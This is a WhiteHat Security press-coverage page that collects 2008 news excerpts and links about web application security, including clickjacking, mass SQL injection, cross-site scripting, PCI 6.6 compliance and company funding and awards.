Website Security News :: 2008 WhiteHat Security Coverage
Recent Site Compromises Highlight Arrival of Web Application Security
 December 2008 | Permalink
At the forefront of computer security at the network, desktop and code levels are the security researchers who blend a mix of skills in hacking, software programming and intelligent detective work to help decode and thwart online criminal behavior. Whether it’s tracking the latest Windows malware, bots, rootkits, attack scripts, distributed denial of service (DDOS), Trojan horses and other Internet and application security flaws, these researchers are at the forefront of protecting data, financial information and identities in an increasingly more open online world. These malware researchers face an uphill battle as the numbers for data breaches and identity theft climb every year. Yet, they push on. Here are 10 security researchers who deserve our praise and thanks. Check out the Security Slideshow Online at Baseline ›››
Recent Site Compromises Highlight Arrival of Web Application Security
 By Steve Ragan -
December 29, 2008 | Permalink
Everyone, from IBM to the IC3, in the 2008 security trends and reporting all agree, the Web as you know it was the single largest avenue of attack in 2008. More than a million Web pages were compromised, leading to the spread of Malware, personal information loss, and a fall in reputation for some businesses.
“It’s unanimous. Web application security is the [number one] avenue of attack according to basically every industry data security report available,” wrote Jeremiah Grossman, Chief Technology Officer of WhiteHat Security, in a recent blog post. Read article online at The Tech Herald ›››
Adobe Hopes to Speed Patch Releases with More Transparency
 By Robert Westervelt, News Editor
Dec 17, 2008 | SearchSecurity.com | Permalink
The Adobe Secure Software Engineering Team (ASSET) is trying to improve visibility in its software development processes to get security researchers to report flaw findings directly to the vendor.
Some vulnerabilities are reported by security researchers to Adobe after first being reported to Mozilla, Microsoft and other software vendors. It often slows the time it takes to roll out a patch, said Brad Arkin, Adobe's director of product security and privacy. Read article online at SearchSecurity.com ›››
Application Security: The Turning Point?
 Are we there yet? Editor in Chief Derek Slater wants to say yes, but an OWASP expert says no.
By Derek Slater
November 14, 2008 | Permalink
I wanted very much to write a column about how we've reached a turning point regarding application security.
It wasn't that I thought one particular cataclysmic event has changed our course for the better. Rather, it was an accumulation of smaller observations and developments: Read article online at CSO ›››
Good Question: How Can I bank Online Safely?
 By JORDAN ROBERTSON
November 11, 2008 | Permalink
Q: I hear so much about hackers attacking Web sites and stealing people's personal information. Is it safe to bank online?
A: One of the scariest things about banking online is that you're forced to enter personal information, like account numbers, that you'd never type anywhere else on the Internet. You're also viewing your most sensitive financial information, and the fear is if you can see it, a skillful hacker might as well.
Getting over that hurdle takes faith in the security of your computer and the banking Web site, but the most paranoid people in the world — computer security experts — say it's absolutely fine to bank online. As long as you guard against the person who is likely your biggest adversary: yourself. Read article online at the Associated Press ›››
Stephanie Fohn, CEO, WhiteHat Security, Named as a Finalist for Best Executive – Non-Services Businesses
 October, 2008 | Permalink
Stevie Awards were created to honor and generate public recognition of the achievements and positive contributions of organizations and business people worldwide. Beginning with The American Business Awards in 2002, The International Business Awards in 2003, The Stevie Awards for Women in Business in 2004, and the Stevie Awards for Sales & Customer Service in 2006, our mission is to raise the profile of exemplary organizations and individuals among the press, the business community, and the general public. In short order the Stevie has become one of the world's most coveted awards.
 The Stevie Awards for Women in Business are governed by a Board of Distinguished Judges & Advisors that features many leading figures in business.
All women entrepreneurs and executives worldwide are eligible to participate in the awards.
Stevie Award winners will be announced at the November 14 awards dinner in New York.
Read more about the awards ›››
Clickjacking Attack Lets Web Sites See, Hear You
 Thomas Claburn
October 8, 2008 | Permalink
The technique can be used to hijack a computer's Webcam and microphone to create a malicious surveillance platform.
Details about the cross-platform browser exploitation technique known as "clickjacking" have started to emerge. Among the more alarming ways it can be used: covertly watching and listening to people who have microphones and Webcams attached to their computers.
"Web pages know what Web sites you've been to ..., where you're logged in, what you watch on YouTube, and now they can literally 'see' and 'hear' you," warned Jeremiah Grossman, founder and CTO of WhiteHat Security, in a blog post...Read article online at InformationWeek ›››
Clickjacking Exploits Enable Hackers to Hijack Webcams
 Angela Moscaritolo
October 8, 2008 | Permalink
A hacker could potentially see and hear you by hijacking your webcam and microphone using clickjacking exploits and Adobe Flash, security researchers said this week.
“The bad news is with clickjacking, any computer with a microphone and/or a web camera attached can be invisibly coaxed into being a remote surveillance device,” Jeremiah Grossman, founder and chief technology officer of WhiteHat Security, wrote on his blog Tuesday...Read article online at SC Magazine ›››
Security Researchers Warn of New 'clickjacking' Browser Bugs
 By Gregg Keizer
September 26, 2008| Permalink
Internet Explorer, Firefox, Safari, Opera, Chrome, others vulnerable to new class of attacks
Security researchers warned today that a new class of vulnerabilities dubbed "clickjacking" puts users of every major browser at risk from attack.
Details of the multiple flaws -- six different types, by one count -- are sketchy, because the researchers, who presented some of their findings at a security conference earlier this week, have purposefully kept their information confidential as at least one vendor works on a fix...Read article online at ComputerWorld ›››
Dan Kaplan
September 26, 2008 | Permalink
Hobbyist Dan Thompson created a website in 2000 for music fans to discuss and trade lyrics of one-hit wonders – think “Come on Eileen” or “Ice, Ice Baby” – he never thought the site would become a cyber target.
But that's just what happened last month, when hackers launched injection attacks against the vulnerable site by inserting a simple, customised script into the URL string. This query manipulated the contents of the Structured Query Language (SQL) Server database – common on most dynamic websites – causing the comment sections below message board threads to disappear...Read article online at SC Magazine ›››
Security Researchers and Vendors – a Truce?
 By Elinor Mills
September 18, 2008| Permalink
There has historically been a clash between security researchers who find security flaws in software products and the companies that make those products.
But two recent examples of cooperation between researchers and vendors show hope for future truces.
Leading by example was Dan Kaminsky, director of penetration testing for IOActive, who warned security software vendors about a fatal flaw in the DNS (Domain Name System) months before going public so vendors could release patches...Read Article Online at CNET ›››
Hacker gets into Palin's Yahoo E-mail Account
 By LISA DEMER ldemer@adn.com
September 18, 2008| Permalink
Cyber agents look into possible 'computer intrusion' crime.
A hacker broke into the Yahoo e-mail account that vice presidential candidate Sarah Palin uses for official business as Alaska's governor as well as for personal communications.
The intrusion, which apparently began early Tuesday morning, alarmed the McCain-Palin campaign, though Internet security experts and Palin critics weren't surprised that her Yahoo account on the Web was vulnerable... Read Article Online at The Anchorage Daily News ›››
In-Depth Analysis Finds More Severe Web Flaws
 By Kelly Jackson Higgins
Senior Editor, Dark Reading
June 10, 2008| Permalink
New Web Application Security Consortium (WASC) report suggests automated scanning alone isn't as thorough when it comes to serious bugs
A new report on Web threats released today by the Web Application Security Consortium says that in-depth manual and automated assessments found nearly 97 percent of sites carry a severe vulnerability... Read Article online at Dark Reading ›››
Friendly Fire
Dan Kaplan
September, 2008| Read Article online at SC Magazine ›››
Protecting users from internet-borne threats falls on trusted websites, says Overstock's Sam Peterson.
Google's Chrome Walls
 By Andy Greenberg
September 2, 2008| Permalink
When Google swallowed the security company GreenBorder in May 2007, the tiny Mountain View, Calif.-based firm seemed to be yet another promising start-up that had disappeared into the Googleplex's catacombs, never to be heard from again.
But on Tuesday, when Google (nasdaq: GOOG - news - people ) revealed its new browser known as Chrome, it became clear how GreenBorder's engineers have been earning their free lunches for the last 15 months: devising a way to inoculate the search giant's new toy against the Web's epidemic of cybercrime... Read Article online at Forbes ›››
Business Logic Flaws Endanger Websites
Dan Kaplan
August 12, 2008| Permalink
Never mind scanning your website for vulnerabilities in code to prevent attacks.
That may not be enough to protect from another high-risk business impediment: logic flaws. And the potential cost to victim sites could be in the millions.
Two researchers from WhiteHat Security, an application security firm, explained at the Black Hat conference in Las Vegas that business logic flaws often are overlooked by quality assurance teams. Meanwhile, their presence is only expected to grow in coming years... Read Article online at SC Magazine ›››
Eyeballing the Security of Application Service Providers
Jeremiah Grossman, Founder and CTO WhiteHat Security
July 02, 2008 | Permalink
Jeremiah Grossman, founder and Chief Technology Officer of WhiteHat Security, gives advice on vetting Application Service Providers to ensure security for your business
A large number of banks, credit unions, product merchants, healthcare providers, and others are taking advantage of Application Services Providers (ASPs) to enhance their on-line offerings and reduce IT cost. Popular ASPs offer attractive service packages that include the necessary hardware and software infrastructure, such as fast, reliable machines, large bandwidth pipes, disaster-recovery policies, several layers of built-in fault tolerance, and support...
Read Article online at CSO ›››
12 Ways to Visualize Network Security
 By Network World Staff, Network World, 07/14/08 | Permalink
Security is like a stack of Swiss cheese. Each slice covers up holes in the slices below it.
By Jeremiah Grossman, CTO, Whitehat Security
Traditional enterprise security is viewed as a hard outer shell protecting a soft interior, but today's Web 2.0 era has changed all that. The perimeter has become porous with applications and access control shared deep between enterprises and consumers. In this way enterprise security can be best viewed like a stack of Swiss cheese. No single layer of security is impenetrable; each protects certain areas and misses others. In a layered approach each slice (defense-in-depth) attempts to cover up the holes in the one below it...Read Article Online at Network World ›››
Industry View: Web Application Security Today - Are We All Insane?
Jeremiah Grossman, Founder and CTO WhiteHat Security
July 02, 2008 | Permalink
WhiteHat Security's Jeremiah Grossman believes the current approach to protecting Web apps is the very picture of insanity
Seventeen million programmers are churning out an estimated 102 billion new lines of code per year. Add 162 million websites online, with 809,000 using SSL (an indication of valuable data) and the problem becomes apparent. Researchers estimate that roughly one security defect exists per 10,000 lines of code and nine out of 10 websites contain one or more serious vulnerabilities. If only 1 percent of security defects are exploitable that means we are generating 102,000 zero-days per year - we just don't know where most of them are. Even if 90 percent of the SSL websites contained only a single issue, 728,100 website vulnerabilities are already in circulation, and we don't know where those are, either...Read Article Online at CSO ›››
SaaS Security Firm WhiteHat Lands $7m Series D Financing
 Analyst: Paul Roberts
June 30, 2008| Permalink
Event summary
- WhiteHat Security said on June 23 that it had raised $7m in series D financing from existing investors and new investor Horizon Ventures. The latest round brings total funding in WhiteHat to $13.2m.
- WhiteHat said it will use the money for sales, marketing and product development, and to improve its software-as-a-service (SaaS) infrastructure to meet customer demand.
- WhiteHat said it is seeing steep growth in demand from compliance-minded customers and notes that an update (version 6.6) to the Payment Card Industry Data Security Standard (PCI DSS) requires application code reviews.
Download the 451 Report ›››
Merchants Asked to Secure Their Sites
 By Deborah Gage, Chronicle Staff Writer
23 Jun 2008 21:56
June 30, 2008| Permalink
Today is the deadline for any business that accepts credit cards over the Internet to meet new security standards for their Web sites.
But not all businesses are expected to make the deadline, and for those that do, it's not clear how much more secure their sites will be... Read article online at the San Francisco Chronicle ›››
Web Browsers Face Crisis of Security Confidence
 By Dan Good in San Francisco
23 Jun 2008 21:56
June 26, 2008| Permalink
User beware. Today's web browsers offer more security protections than ever, but according to security experts, they do little to protect people surfing the net from some the web's oldest and most crippling threats...Read article online at Channel Register ›››
Major Security Vendors' Sites Could Be Launchpads for Phishing Attacks
By Tim Welson, Site Editor, Dark Reading
June 10, 2008| Permalink
McAfee, Symantec, and VeriSign sites all found to contain cross-site scripting flaws
With all the talk about hackers launching attacks from legitimate Websites, you'd think that the major security vendors' sites, at least, would be vulnerability-free...Read article online at Dark Reading ›››
Site Security Policy
By Steve Ragan
June 10, 2008| Permalink
Brandon Sterne, Security Program Manager at Mozilla, recently published a proposal for a set of browser security features. The proposal, SSP or Site Security Policy, aims to allow browser vendors a chance to do more to protect users from XSS and CSRF threats. Currently SSP is open for comments, and is only available as an add-on for Firefox. Read article online at The Tech Herald ›››
The SaaS Approach to Web Site Vulnerability Management
 By Stephanie Fohn
May 14, 2008| Permalink
Software as a Service is the only solution for Web site vulnerability management, asserts Stephanie Fohn, chief executive officer of WhiteHat Security, because of its scalability and ease of implementation, among other reasons.
Securing Web applications is the No. 1 problem facing security professionals today. With 162 million Web sites in existence and millions more popping up each month, the sheer size of the problem is staggering -- not to mention the fact that nine out of 10 Web sites have serious vulnerabilities that can put critical customer data at risk. In fact, a new malware-infected Web site is discovered every 14 seconds. So, why aren't more companies solving this problem?
Read article at E-Commerce Times ›››
Few Expected to Make June 30 PCI Deadline for Web Application Security
 By Jaikumar Vijayan
May 12, 2008| Permalink
Many firms just now shaking off the mental cobwebs
May 12, 2008 (Computerworld) Retailers covered by the Payment Card Industry Data Security Standard (PCI-DSS) have just about a month and a half left to comply with new requirements for protecting Web applications. But as with previous PCI-related deadlines, this one appears destined to pass with a majority of merchants unlikely to be in full compliance. Read article at Computerworld ›››
Deconstructing PCI 6.6
Trey Ford
Director of Solutions Architecture, WhiteHat Security
May 12, 2008| Permalink
Organizations handling credit cards feel pressure building as the deadline for PCI Requirement 6.6 compliance, June 30, 2008, approaches. Most are still evaluating how to strategically ensure compliance with this requirement, while maintaining a strong security posture...Read article at SCMagazine ›››
SQL Injection Attack Infects Hundreds of Thousands of Websites
By Michael S. Mimoso,
Editor, Information Security Magazine
April 28, 2008| Permalink
Chinese hackers have conducted successful SQL injection attacks on hundreds of thousands of websites during the past 10 days, culling their targets from search engines.
Normally, SQL injection attacks are targeted attacks, one IP address at a time. The closest attack on this scale would be the SAMY worm attack on the MySpace.com domain, but that was against just one domain.
Read article at SearchSecurity.com ›››
Google-Hacking Goes To China
By Andy Greenberg,
April 28, 2008| Permalink
Google has yet to bring its U.S. success to China--only about one in five Chinese Web searches starts at the site. But lately, Google seems to have gained popularity with at least one group of Chinese Web users: some of the country's most successful cybercriminals...Read article at Forbes ›››
Web 2.0 Security Hangover  By Brian Prince
April, 2008| Permalink
The Web 2.0 party was a great time, but security pros and analysts are waking up to new problems.
Web 2.0 applications have certainly made the user experience more interactive, but organizations need to be mindful of their impact on Web site security.
Certainly, there are a number of reasons Web sites become an attractive target for hackers; sometimes sites are built prior to an attack being known about, or the developers were in a hurry. Still, some researchers say the Web 2.0 rush has had an impact on security as well, opening up new possibilities for attackers...Read article at eWeek ›››
The FutureNow List  April 2008| Permalink
When The FutureNow List debuted a year ago IT security emerged as a spending priority, with the lion’s share of investment made in secure authentication. But as the first signs of the subprime crunch gave way to a crisis and yet another rogue trader got his 15 minutes of fame—this time it was Societe Generale’s Jerome Kerviel—information technology leaders were already turning their attention to risk management and compliance. Timing is everything: Prompted by recent events, politicians and regulators edge toward a sea-change in regulatory oversight...Read article at BTN ›››
Hackers infiltrate Google searches By Phil Muncaster
April, 2008| Permalink
Hackers have turned their attention to search engines in the latest attempt to invade the computers of unsuspecting Web users.
In the past few weeks, they have taken advantage of Web pages that incorrectly use JavaScript, a computer language used in features like interactive maps, to infect thousands of sites. The altered sites show up in a Google search, and when clicked on, redirect the user to a malicious program that aims to steal information...Read article online at the San Francisco Chronicle ›››
Google searchers could end up with a new type of bug  By Byron Acohido and Jon Swartz
March 31, 2008| Permalink
Cybercrooks are manipulating the computer code used to put the pizazz in millions of websites in hopes of taking over unsuspecting consumers' PCs...Read article online at ABC News ›››
WhiteHat Seeks To Protect Top E-Commerce Sites by Art Wittmann
March 10, 2008| Permalink
WhiteHat CEO Stephanie Fohn says that you need her company's service if you've got a Web site that takes transactions. WhiteHat is a SaaS vendor that offers back-box penetration tests for Web sites... Read article and view video clip online at Information Week ›››
Phishing With SuperBait February 2008 | Permalink
Security researchers have all the fun, like making up the pun-ny names for the new exploits they discover or detect. Case in point: “Phishing with superbait” is an increasing phenomenon in which cyber thieves take over an actual corporate Website using cross-site scripting, says WhiteHat Security founder and CTO Jeremiah Grossman. Cross-site scripting errors remain the most common vulnerability on financial services Websites, Grossman says...Read article online at Bank Technology News ›››
New Firefox Flaw Deemed Low-Risk Threatby Dan Kaplan
January, 24 2008 | Permalink
Mozilla officials are investigating a new vulnerability in Firefox that could be exploited by attackers to steal files from a victim's machiner...Read article online at SC Magazine ›››
The Lurking Perils of Online TransactionsJanuary 22, 2008 | Permalink
By Jeremiah Grossman
E-commerce has been part of the retail world for more than a decade, and today's consumers seem to assume that because of this longevity, their transactions are secure. Beyond this, the average online shoppers are convinced their credit card numbers and other sensitive information are out of reach of attackers with a firewall and antivirus program, combined with shopping at brand-name retail sites...Read article online at Ecommerce Times ›››
Apple Fixes a Quartet of QuickTime Flaws January 16, 2008 | Permalink
By Sean Michael Kerner
With all the hype surrounding Apple this week and its MacWorld event it's easy to forget that Apple is a company under a security siege. More specifically, Apple's QuickTime software has faced far more than its fair share of security woes over the past year. The software plays a critical role in Apple's ability to deliver multimedia content on its Mac and iTunes platforms...Read article online at internetnews.com ›››
WhiteHat Security CEO Named Recipient of Annual Tribute to Women (TWIN) AwardsJanuary 8, 2008 | Permalink
WhiteHat Security, the leading provider of website vulnerability management services, today announced that the Silicon Valley YWCA has named the Company’s Chief Executive Officer, Stephanie Fohn, a winner of the 2007 TWIN Award...
Read article online at Forbes ›››
Widespread Flash file flaws allows cross-site
scripting attacks by Frank Washkuch Jr.
January 3, 2008 | Permalink
An attacker can carry out cross-site scripting (XSS) attacks on a vulnerable system through newly disclosed vulnerabilities in Shockwave Flash (SWF) files...
Read article online at SC Magazine ›››
|
